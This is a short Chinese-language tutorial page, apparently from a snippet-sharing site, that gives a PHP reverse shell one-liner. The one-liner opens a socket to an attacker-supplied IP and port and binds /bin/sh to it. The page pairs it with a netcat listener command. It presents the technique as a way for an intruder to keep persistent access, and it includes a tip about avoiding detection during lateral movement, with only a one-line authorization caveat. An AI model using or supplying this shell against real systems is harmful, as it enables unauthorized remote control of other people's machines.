📜  php reverse shell oneliner - PHP (1)

📅  最后修改于: 2023-12-03 15:18:20.953000             🧑  作者: Mango

PHP Reverse Shell Oneliner

在网络安全中,反向 shell 是一种非常有用的技术,可以使攻击者在偷偷地入侵系统后维持持久性,并使其能够在任何时间返回该系统,而不必重新得到访问权限。 在 PHP 中,这个反向 shell 可以非常容易地实现,只需一行代码即可。

以下是一个简单易用的 PHP 反向 shell oneliner:

php -r '$sock=fsockopen("<your-IP>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

该 one-liner 中的代码段使用 PHP 的 -r 选项,以运行提供的 PHP 代码。代码打开一个与攻击者的主机的连接,然后在另一个文件描述符上(3,在连接上),将 bash shell 的 stdin、stdout 和 stderr 重定向到攻击者的主机上。

在使用此 oneliner 之前,需要在攻击者机器上启动一个监听器,并将端口指定为代码中使用的端口。

示例使用 netcat 监听器,指定端口 1234:

nc -vvlnp 1234
注意事项
  1. 需要进行横向移动并在攻击者计算机上运行脚本时,请使用无线脚本,以免在传输过程中被发现。
  2. 确保监听端口与使用该 oneliner 的端口相同。
  3. 仅使用在安全环境下进行测试,切勿在未经授权的环境中使用。

如果能熟练使用这个简单的 oneliner,那么在必要时,您将能够更快更容易地使用 PHP 对系统进行反向 shell。但是请务必小心,以免出现不必要的安全问题。